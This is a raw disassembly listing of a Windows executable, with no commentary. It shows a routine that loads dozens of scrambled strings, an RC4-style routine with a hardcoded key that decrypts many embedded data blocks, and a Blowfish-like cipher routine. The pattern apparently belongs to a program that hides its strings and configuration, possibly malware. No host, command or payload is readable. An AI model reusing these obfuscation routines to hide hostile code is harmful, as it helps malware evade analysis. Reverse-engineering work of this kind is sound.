push offset aNyjsr1cv5ch0 ; "NyJsR1cV5CH0"
push esi
call sub_415641
push offset aI6sd4ctzn0 ; "/I6sD/4CTzn0"
push esi
call sub_415641
push offset aWrlthN3uh_1 ; "WRlth/n3Uh.1"
push esi
call sub_415641
push offset aYqjsn0wtutn1 ; "yQJsn0wtUtn1"
push esi
call sub_415641
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push esi
call sub_415641
push offset aO_sxv_ze9bk1go ; "O.sxv.ze9bK1GOISY.dO.Vn1"
push esi
call sub_415641
add esp, 40h
push offset aFfec81uznt81 ; "fFEC81UzNT81"
push esi
call sub_415641
push offset aJvatg1988z81 ; "jVATg1988z81"
push esi
call sub_415641
push offset aPrttt0s3ag916n ; "pRTtT0s3aG916N5aw.affEY1"
push esi
call sub_415641
push offset aHm1h_049e4o ; "Hm1H.049e4O/"
push esi
call sub_415641
push offset aWj27_1belx20 ; "wj27.1Belx20"
push esi
call sub_415641
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
push esi
call sub_415641
push offset a6h4nn1igjm60 ; "6h4NN1IGJm60"
push esi
call sub_415641
push offset aUr6ne_mot50_ ; "Ur6ne.MOT50."
push esi
call sub_415641
add esp, 40h
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push esi
call sub_415641
push offset aXlpyr1anpgm0 ; "xLpyR1aNPGm0"
push esi
call sub_415641
push offset aWpukb_0uioaOfu ; "WPUkb.0uIoa/OFUur11TNYw0"
push esi
call sub_415641
push offset aC4dd9_nojvo1 ; "C4dD9.nojvO1"
push esi
call sub_415641
push offset aJt17j1imtvd1 ; "jt17J1ImTVD1"
push esi
call sub_415641
push offset aLtlec18us5q0 ; "LTLec18US5q0"
push esi
call sub_415641
push offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
push esi
call sub_415641
push offset a7_pak0onymn7ra ; "7.PaK0OnymN/7Razv/1FefF."
push esi
call sub_415641
add esp, 40h
push offset aWhdag1glagf_ ; "WHdAg1glAgf."
push esi
call sub_415641
push offset aLmecq0ygcok ; "lmecq0yGcoK/"
push esi
call sub_415641
push offset aRccsh_adukf1 ; "RcCSh.AdUKf1"
push esi
call sub_415641
push offset aXu6cu1p_sn6_6n ; "XU6CU1p.SN6.6N5aw.affEY1"
push esi
call sub_415641
push offset aHuudgYqzdz ; "HuuDG/YQZDz/"
push esi
call sub_415641
push offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
push esi
call sub_415641
push offset aPtami1_agv ; "PTaMI1/.aGV/"
push esi
call sub_415641
push offset aUhdhc1pcv9i ; "uhdhC1pCV9i/"
push esi
call sub_415641
add esp, 40h
push offset aWulzr_x7xjb0 ; "WUlZR.X7XjB0"
push esi
call sub_415641
push offset aBjatzQyrs11 ; "BjAtz/qyRS11"
push esi
call sub_415641
push offset aBvygm_afzkh0 ; "BVYGm.aFzkh0"
push esi
call sub_415641
push offset aLcgg60qk2mf0 ; "Lcgg60QK2mf0"
push esi
call sub_415641
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
push esi
call sub_415641
push offset aAxauo_rlggx0 ; "aXauo.rLGgX0"
push esi
call sub_415641
push offset aXwzwo1pqcgt16n ; "XWzwO1PqcgT16N5aw.affEY1"
push esi
call sub_415641
push offset aVfeso_qcgdt_ ; "vfEsO.QcgDt."
push esi
call sub_415641
add esp, 40h
push offset aSsoce0jbtxi ; "sSOce0JbTXI/"
push esi
call sub_415641
push offset aXiw8_1hhx7d1 ; "Xiw8.1HHX7d1"
push esi
call sub_415641
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
push esi
call sub_415641
push offset a5oke1awbzq ; "5OkE/1AWBZq/"
push esi
call sub_415641
push offset aIhfnL6b5x ; "/iHFN/l6B5X/"
push esi
call sub_415641
push offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
push esi
call sub_415641
push offset aBnjcz_zig1m0 ; "bNJcZ.ziG1m0"
push esi
call sub_415641
push offset aSfe3h0kclgx0 ; "SFe3H0kCLgx0"
push esi
call sub_415641
add esp, 40h
push offset aYdidb16dnmq_ ; "YdidB16dnMQ."
push esi
call sub_415641
push offset aQvdspRbq6w0 ; "QvDsp/rBQ6w0"
push esi
call sub_415641
push offset aVv3aj1ywfkc_xz ; "VV3AJ1ywFkC.XzinP/s/R0A."
push esi
call sub_415641
push offset aNd4qzY5xml0rna ; "nD4Qz/y5xMl0RNAQI05pV11/XzinP/s/R0A."
push esi
call sub_415641
push offset aRy6iq0udbph ; "RY6IQ0UDbPh/"
push esi
call sub_415641
push offset aW3nki_guvjx ; "w3NKI.gUvJx/"
push esi
call sub_415641
push offset aRy6iq0udbphLlD ; "RY6IQ0UDbPh/LL/Dw.r3B9K/"
push esi
call sub_415641
push offset aRy6iq0udbphN2n ; "RY6IQ0UDbPh/N2NHs/pc9zb/8Wb3v063Ds00"
push esi
call sub_415641
add esp, 40h
push offset a8cbgoRjryr_ ; "8CBGO/rJRYr."
push esi
call sub_415641
push offset aKbwmi16jfhl ; "KbwMi16jFhl/"
push esi
call sub_415641
push offset aIde746o6B_ ; "Ide74/6o6/B."
push esi
call sub_415641
push offset aY2lm40nv3yaP4m ; "Y2LM40Nv3Ya/p4MrM1AZiAp1eUok8/eobtx1"
push esi
call sub_415641
push offset a7zfry0iusme1 ; "7Zfry0IUSmE1"
push esi
call sub_415641
push offset a_9fty1n2tM_ ; ".9ftY1N2T/m."
push esi
call sub_415641
push offset aVxppy0owq7d ; "VxPpy0owQ7D/"
push esi
call sub_415641
push offset aW50oj_ac8ak0 ; "w50OJ.ac8AK0"
push esi
call sub_415641
add esp, 40h
push offset aVgh9x1uWay0 ; "VgH9X1u/wAY0"
push esi
call sub_415641
push offset aEih0f1gakfp0 ; "EiH0f1GakFP0"
push esi
call sub_415641
push offset aUfbss0cbo8c_ ; "uFbSS0Cbo8C."
push esi
call sub_415641
push offset aLvk_hHddio0 ; "Lvk.H/hddio0"
push esi
call sub_415641
push offset aJsuah_0_mmw0zb ; "JsuAH.0.mmW0zbFKT0RKhRb0"
push esi
call sub_415641
push offset aAqq27_7qqv10 ; "AQQ27.7qQv10"
push esi
call sub_415641
push offset a2Afm0dt3o6_ ; "2/Afm0dt3o6."
push esi
call sub_415641
push offset aQvp40nd9f2 ; "/qvP40nD9F2/"
push esi
call sub_415641
add esp, 40h
push offset aMkk0_mvscp_hwh ; "mKK0/.MVScP.hwHKV/Er1cB0ZvOBu/66U/i/nNp"...
push esi
call sub_415641
push offset aShktk1eNl8Jlzt ; "sHKtk1e/Nl8/jLZte1JtI/t1"
push esi
call sub_415641
push offset aZcm1__num3n0oe ; "ZcM1..nUM3N0OE819.1TEYD."
push esi
call sub_415641
push offset a5_xnq0cowxs0 ; "5.Xnq0cowXs0"
push esi
call sub_415641
push offset a8y4sz09fdh50tc ; "8Y4sz09fDH50tccap0cH5OH0/mDXM1sxCV2/iNR"...
push esi
call sub_415641
push offset aRnyaa0crtpo0yy ; "RNYAA0crTPO0yYB2h.Fe8bw.iRLzu0EdQ3j/1D6"...
push esi
call sub_415641
push offset aEuior0ay2w7_ ; "EUIOR0ay2w7."
push esi
call sub_415641
push offset aTfee90w_vdg1u8 ; "TFEE90W.vdG1u8Ajp1eidrT.d2k2X/no6gm/"
push esi
call sub_415641
add esp, 40h
push offset aIbtox1Hofe0hcx ; "IBtOx1/HOfe0Hcxmb/oUlVg00eWuQ.F61Hj/"
push esi
call sub_415641
push offset aTpzyk0moe8_0jt ; "TpzyK0MOE8.0jTPEZ1dC0uG0"
push esi
call sub_415641
push offset a4ezrg1ye5hp1o2 ; "4Ezrg1ye5hp1O2jqY1BhtQc.jTPEZ1dC0uG0"
push esi
call sub_415641
push offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
push esi
call sub_415641
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push esi
call sub_415641
push offset a2ms3c_kjtek0 ; "2MS3c.kJTeK0"
push esi
call sub_415641
push offset aOgyzo1Qmpy1 ; "OGyZo1/qmpy1"
push esi
call sub_415641
push offset aNI427pnt0 ; "n/i4//27pnT0"
push esi
call sub_415641
add esp, 40h
push offset aXg4wo0gh6fy0p9 ; "xg4wO0Gh6FY0p9CIj.BYYVY."
push esi
call sub_415641
push offset aTarxm0mtxpp_ ; "tArXm0mtxpp."
push esi
call sub_415641
push offset aQ3bef_grjcn1aa ; "Q3BEf.grJCN1aA/Td0EX07M1"
push esi
call sub_415641
push offset aPJs70eukyp0 ; "P/JS70EukYp0"
push esi
call sub_415641
push offset aUDneTzo8s_omqd ; "u/DnE/tzo8s.OMQDW1DERIa/"
push esi
call sub_415641
push offset a2n67h0pevch1 ; "2n67H0PEVch1"
push esi
call sub_415641
push offset a5v1zc1efrzg_tc ; "5v1zc1EfRZg.tccap0cH5OH0NHckR.k9Wj.1"
push esi
call sub_415641
push offset a6f3al1m_ydx05y ; "6f3aL1m.YdX05ythl/YiVnR/jSlje0VWu/50peq"...
push esi
call sub_415641
add esp, 40h
push offset a3un9w_temux_5y ; "3Un9W.TEMuX.5ythl/YiVnR/J9IiO.VPA7i1"
push esi
call sub_415641
push offset a7nmru1owjrg0md ; "7NmRu1oWjRG0Md/AN15kOfy.nR01m1pzFKu1"
push esi
call sub_415641
push offset aNeuf6qyoiMdAn1 ; "NEuF//6QYOi/Md/AN15kOfy.nR01m1pzFKu1"
push esi
call sub_415641
push offset aNxruj_viib6 ; "nxruJ.vIib6/"
push esi
call sub_415641
push offset a5gcpxGycn21n1z ; "5GCpx/gYCn21N1Zsj.w3Ty30"
push esi
call sub_415641
push offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
push esi
call sub_415641
push offset aPimgt12pvee_ ; "pImgT12pvEE."
push esi
call sub_415641
push offset aJgyqn0dmzir12z ; "jgYqN0dmziR12zQe40gFoLm.rilJR.uuL/I0"
push esi
call sub_415641
add esp, 40h
push offset aAqejv_njvii_y8 ; "aQeJV.nJvIi.y8Ri./b5L.q."
push esi
call sub_415641
pop ecx
pop ecx
pop esi
retn
sub_41567F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4163BB proc near ; CODE XREF: sub_416596+18�p
; sub_416596+30�p ...
var_394 = byte ptr -394h
var_1EC = byte ptr -1ECh
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_3F = byte ptr -3Fh
var_3E = byte ptr -3Eh
var_3D = byte ptr -3Dh
var_3C = byte ptr -3Ch
var_3B = byte ptr -3Bh
var_3A = byte ptr -3Ah
var_39 = byte ptr -39h
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_36 = byte ptr -36h
var_35 = byte ptr -35h
var_34 = byte ptr -34h
var_33 = byte ptr -33h
var_32 = byte ptr -32h
var_31 = byte ptr -31h
var_30 = byte ptr -30h
var_2F = byte ptr -2Fh
var_2E = byte ptr -2Eh
var_2D = byte ptr -2Dh
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = byte ptr -2Ah
var_29 = byte ptr -29h
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = byte ptr -26h
var_25 = byte ptr -25h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = byte ptr -22h
var_21 = byte ptr -21h
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_1E = byte ptr -1Eh
var_1D = byte ptr -1Dh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 394h
push ebx
push esi
lea eax, [ebp+var_40]
push edi
xor ebx, ebx
push eax
xor edi, edi
mov [ebp+var_40], 0Ah
mov [ebp+var_3F], 0Eh
mov [ebp+var_3E], 20h
mov [ebp+var_3D], 48h
mov [ebp+var_3C], 0Bh
mov [ebp+var_3B], 2Bh
mov [ebp+var_3A], 0Ch
mov [ebp+var_39], 23h
mov [ebp+var_38], 3Ah
mov [ebp+var_37], 27h
mov [ebp+var_36], 28h
mov [ebp+var_35], 5Eh
mov [ebp+var_34], 2Ah
mov [ebp+var_33], 1Eh
mov [ebp+var_32], 2Dh
mov [ebp+var_31], 5Ah
mov [ebp+var_30], 1Bh
mov [ebp+var_2F], 0Fh
mov [ebp+var_2E], 4Ch
mov [ebp+var_2D], 44h
mov [ebp+var_2C], 16h
mov [ebp+var_2B], 4
mov [ebp+var_2A], 57h
mov [ebp+var_29], 23h
mov [ebp+var_28], 11h
mov [ebp+var_27], 53h
mov [ebp+var_26], 38h
mov [ebp+var_25], 13h
mov [ebp+var_24], 0Dh
mov [ebp+var_23], 12h
mov [ebp+var_22], 25h
mov [ebp+var_21], 1Ch
mov [ebp+var_20], 30h
mov [ebp+var_1F], 12h
mov [ebp+var_1E], 50h
mov [ebp+var_1D], 4Fh
mov [ebp+var_1C], 39h
mov [ebp+var_1B], 10h
mov [ebp+var_1A], 42h
mov [ebp+var_19], 1Fh
mov [ebp+var_18], 37h
mov [ebp+var_17], 1Dh
mov [ebp+var_16], 41h
mov [ebp+var_15], 55h
mov [ebp+var_14], 2Ch
mov [ebp+var_13], 41h
mov [ebp+var_12], 2Ch
mov [ebp+var_11], 5Dh
mov [ebp+var_10], bl
call sub_4293A0
mov esi, 1A5h
mov [ebp+var_C], eax
push esi
lea eax, [ebp+var_1EC]
push ebx
push eax
call sub_429760
push esi
lea eax, [ebp+var_394]
push ebx
push eax
call sub_429760
add esp, 1Ch
xor eax, eax
mov ecx, 1A4h
loc_4164C5: ; CODE XREF: sub_4163BB+114�j
mov [ebp+eax+var_1EC], al
inc eax
cmp eax, ecx
jb short loc_4164C5
xor esi, esi
loc_4164D3: ; CODE XREF: sub_4163BB+12E�j
cmp edi, [ebp+var_C]
jnz short loc_4164DA
xor edi, edi
loc_4164DA: ; CODE XREF: sub_4163BB+11B�j
mov al, [ebp+edi+var_40]
inc edi
mov [ebp+esi+var_394], al
inc esi
cmp esi, ecx
jb short loc_4164D3
xor edx, edx
xor edi, edi
loc_4164EF: ; CODE XREF: sub_4163BB+168�j
movzx ebx, [ebp+edi+var_394]
lea esi, [ebp+edi+var_1EC]
add edx, ebx
mov ebx, ecx
mov al, [esi]
mov [ebp+var_1], al
movzx eax, al
add eax, edx
xor edx, edx
div ebx
inc edi
cmp edi, ecx
lea eax, [ebp+edx+var_1EC]
mov bl, [eax]
mov [esi], bl
mov bl, [ebp+var_1]
mov [eax], bl
jb short loc_4164EF
xor eax, eax
cmp [ebp+arg_4], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
jbe short loc_416591
jmp short loc_416537
; ---------------------------------------------------------------------------
loc_416534: ; CODE XREF: sub_4163BB+1D4�j
mov eax, [ebp+var_44]
loc_416537: ; CODE XREF: sub_4163BB+177�j
inc eax
xor edx, edx
mov esi, ecx
mov edi, ecx
div esi
mov [ebp+var_44], edx
lea esi, [ebp+edx+var_1EC]
xor edx, edx
mov bl, [esi]
movzx eax, bl
add eax, [ebp+var_C]
div edi
mov [ebp+var_C], edx
lea eax, [ebp+edx+var_1EC]
mov dl, [eax]
mov [esi], dl
mov edx, [ebp+var_8]
mov [eax], bl
mov eax, [ebp+arg_0]
lea edi, [edx+eax]
movzx eax, byte ptr [esi]
movzx edx, bl
add eax, edx
xor edx, edx
mov esi, ecx
div esi
mov al, [ebp+edx+var_1EC]
xor [edi], al
inc [ebp+var_8]
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jb short loc_416534
loc_416591: ; CODE XREF: sub_4163BB+175�j
pop edi
pop esi
pop ebx
leave
retn
sub_4163BB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416596 proc near ; CODE XREF: sub_418E0F+76�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
xor esi, esi
push edi
push esi
mov edi, offset dword_4439A8
push esi
push edi
call sub_4293A0
pop ecx
push eax
push edi
call sub_4163BB
add esp, 10h
mov edi, offset dword_4439B4
push esi
push esi
push edi
call sub_4293A0
pop ecx
push eax
push edi
call sub_4163BB
add esp, 10h
mov edi, offset dword_443E68
push esi
push esi
push edi
call sub_4293A0
pop ecx
push eax
push edi
call sub_4163BB
add esp, 10h
mov edi, offset dword_443E8C
push esi
push esi
push edi
call sub_4293A0
pop ecx
push eax
push edi
call sub_4163BB
add esp, 10h
mov edi, offset dword_443EB0
push esi
push esi
push edi
call sub_4293A0
pop ecx
push eax
push edi
call sub_4163BB
add esp, 10h
xor ebx, ebx
cmp [ebp+arg_0], esi
jle short loc_41663F
loc_41661D: ; CODE XREF: sub_416596+A7�j
lea edi, ds:443F00h[ebx*4]
push esi
push esi
push dword ptr [edi]
call sub_4293A0
pop ecx
push eax
push dword ptr [edi]
call sub_4163BB
add esp, 10h
inc ebx
cmp ebx, [ebp+arg_0]
jl short loc_41661D
loc_41663F: ; CODE XREF: sub_416596+85�j
push esi
mov edi, offset dword_443F14
push esi
push edi
call sub_4293A0
pop ecx
push eax
push edi
call sub_4163BB
add esp, 10h
mov edi, offset off_443F18
push esi
push esi
push edi
call sub_4293A0
pop ecx
push eax
push edi
call sub_4163BB
add esp, 10h
mov edi, offset byte_457F6C
push esi
push esi
push edi
call sub_4293A0
pop ecx
push eax
push edi
call sub_4163BB
add esp, 10h
mov edi, offset byte_457F6D
push esi
push esi
push edi
call sub_4293A0
pop ecx
push eax
push edi
call sub_4163BB
add esp, 10h
mov edi, offset dword_443F1C
push esi
push esi
push edi
call sub_4293A0
pop ecx
push eax
push edi
call sub_4163BB
add esp, 10h
mov edi, offset dword_443F24
push esi
push esi
push edi
call sub_4293A0
pop ecx
push eax
push edi
call sub_4163BB
add esp, 10h
mov edi, offset dword_443F2C
push esi
push esi
push edi
call sub_4293A0
pop ecx
push eax
push edi
call sub_4163BB
add esp, 10h
mov edi, offset dword_443F34
push esi
push esi
push edi
call sub_4293A0
pop ecx
push eax
push edi
call sub_4163BB
mov eax, [ebp+arg_4]
add esp, 10h
cmp eax, esi
jle short loc_416745
mov edi, offset byte_443FDF
mov [ebp+arg_0], eax
loc_41670E: ; CODE XREF: sub_416596+1AD�j
lea ebx, [edi-9Fh]
push esi
push esi
push ebx
call sub_4293A0
pop ecx
push eax
push ebx
call sub_4163BB
add esp, 10h
push esi
push esi
push edi
call sub_4293A0
pop ecx
push eax
push edi
call sub_4163BB
add esp, 10h
add edi, 0B8h
dec [ebp+arg_0]
jnz short loc_41670E
loc_416745: ; CODE XREF: sub_416596+16E�j
push esi
mov edi, offset dword_444F14
push esi
push edi
call sub_4293A0
pop ecx
push eax
push edi
call sub_4163BB
add esp, 10h
mov edi, offset byte_445013
push esi
push esi
push edi
call sub_4293A0
pop ecx
push eax
push edi
call sub_4163BB
add esp, 10h
mov edi, offset dword_445324
push esi
push esi
push edi
call sub_4293A0
pop ecx
push eax
push edi
call sub_4163BB
add esp, 10h
mov edi, offset byte_445423
push esi
push esi
push edi
call sub_4293A0
pop ecx
push eax
push edi
call sub_4163BB
add esp, 10h
mov edi, offset dword_445734
push esi
push esi
push edi
call sub_4293A0
pop ecx
push eax
push edi
call sub_4163BB
add esp, 10h
mov edi, offset byte_445833
push esi
push esi
push edi
call sub_4293A0
pop ecx
push eax
push edi
call sub_4163BB
add esp, 10h
mov edi, offset a3c9 ; "]&3c9"
push esi
push esi
push edi
call sub_4293A0
pop ecx
push eax
push edi
call sub_4163BB
add esp, 10h
mov edi, offset dword_4439BC
push esi
push esi
push edi
call sub_4293A0
pop ecx
push eax
push edi
call sub_4163BB
add esp, 10h
push esi
mov edi, offset dword_443A5C
push esi
push edi
call sub_4293A0
pop ecx
push eax
push edi
call sub_4163BB
add esp, 10h
mov edi, offset byte_443B5B
push esi
push esi
push edi
call sub_4293A0
pop ecx
push eax
push edi
call sub_4163BB
add esp, 10h
mov edi, offset dword_4439CC
push esi
push esi
push edi
call sub_4293A0
pop ecx
push eax
push edi
call sub_4163BB
add esp, 10h
mov edi, offset dword_4439E8
push esi
push esi
push edi
call sub_4293A0
pop ecx
push eax
push edi
call sub_4163BB
add esp, 10h
push esi
push esi
mov esi, offset loc_443A08
push esi
call sub_4293A0
pop ecx
push eax
push esi
call sub_4163BB
add esp, 10h
pop edi
pop esi
pop ebx
pop ebp
retn
sub_416596 endp
; =============== S U B R O U T I N E =======================================
sub_416882 proc near ; CODE XREF: sub_4170D6+65�p
; sub_417212+68�p
var_8 = dword ptr -8
push esi
push 48h
mov esi, ecx
call sub_42B4D7
mov [esi], eax
mov [esp+8+var_8], 13A0h
call sub_42B4D7
mov [esi+4], eax
pop ecx
mov eax, esi
pop esi
retn
sub_416882 endp
; =============== S U B R O U T I N E =======================================
sub_4168A2 proc near ; CODE XREF: sub_4170D6+12B�p
; sub_417212+13F�p
push esi
mov esi, ecx
push dword ptr [esi]
call sub_4290D0
push dword ptr [esi+4]
call sub_4290D0
pop ecx
pop ecx
pop esi
retn
sub_4168A2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4168B8 proc near ; CODE XREF: sub_416F9C+C0�p
; sub_416F9C+F3�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov edi, [ecx]
mov edx, [eax]
mov eax, [ecx+4]
xor ecx, ecx
xor edx, [edi]
xor ebx, ebx
mov [ebp+var_C], edi
mov [ebp+var_4], edx
mov esi, edx
mov cl, byte ptr [ebp+var_4+2]
mov bl, dh
shr esi, 18h
mov ecx, [eax+ecx*4+4E8h]
add ecx, [eax+esi*4]
mov esi, 0FFh
and edx, esi
xor ecx, [eax+ebx*4+9D0h]
add ecx, [eax+edx*4+0EB8h]
mov edx, [ebp+arg_4]
xor ecx, [edi+4]
xor ecx, [edx]
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+8]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+0Ch]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+10h]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
xor edx, [eax+ebx*4+9D0h]
and edi, esi
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+14h]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+18h]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+1Ch]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+20h]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+24h]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor edx, [edi+28h]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
xor ebx, ebx
add edx, [eax+edi*4]
mov bl, byte ptr [ebp+var_4+1]
mov edi, [ebp+var_4]
xor edx, [eax+ebx*4+9D0h]
and edi, esi
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+2Ch]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+30h]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+34h]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
xor ebx, ebx
xor edx, [edi+38h]
xor [ebp+var_4], edx
xor edx, edx
mov dl, byte ptr [ebp+var_4+2]
mov edi, [ebp+var_4]
mov bl, byte ptr [ebp+var_4+1]
mov edx, [eax+edx*4+4E8h]
shr edi, 18h
add edx, [eax+edi*4]
mov edi, [ebp+var_4]
and edi, esi
xor edx, [eax+ebx*4+9D0h]
add edx, [eax+edi*4+0EB8h]
mov edi, [ebp+var_C]
xor edx, [edi+3Ch]
xor ecx, edx
xor edx, edx
mov [ebp+var_8], ecx
mov ebx, ecx
mov dl, byte ptr [ebp+var_8+2]
shr ebx, 18h
mov edx, [eax+edx*4+4E8h]
add edx, [eax+ebx*4]
xor ebx, ebx
mov bl, ch
xor edx, [eax+ebx*4+9D0h]
mov ebx, ecx
and ebx, esi
add edx, [eax+ebx*4+0EB8h]
mov eax, [ebp+var_4]
xor edx, [edi+40h]
xor eax, edx
mov edx, [ebp+arg_4]
xor ecx, [edi+44h]
pop edi
mov [edx], eax
mov eax, [ebp+arg_0]
pop esi
pop ebx
mov [eax], ecx
leave
retn 8
sub_4168B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416C29 proc near ; CODE XREF: sub_417212+D5�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov edi, [ecx]
xor ebx, ebx
mov [ebp+var_C], edi
mov edx, [edi+44h]
xor edx, [eax]
mov eax, [ecx+4]
xor ecx, ecx
mov [ebp+var_4], edx
mov esi, edx
mov cl, byte ptr [ebp+var_4+2]
mov bl, dh
shr esi, 18h
mov ecx, [eax+ecx*4+4E8h]
add ecx, [eax+esi*4]
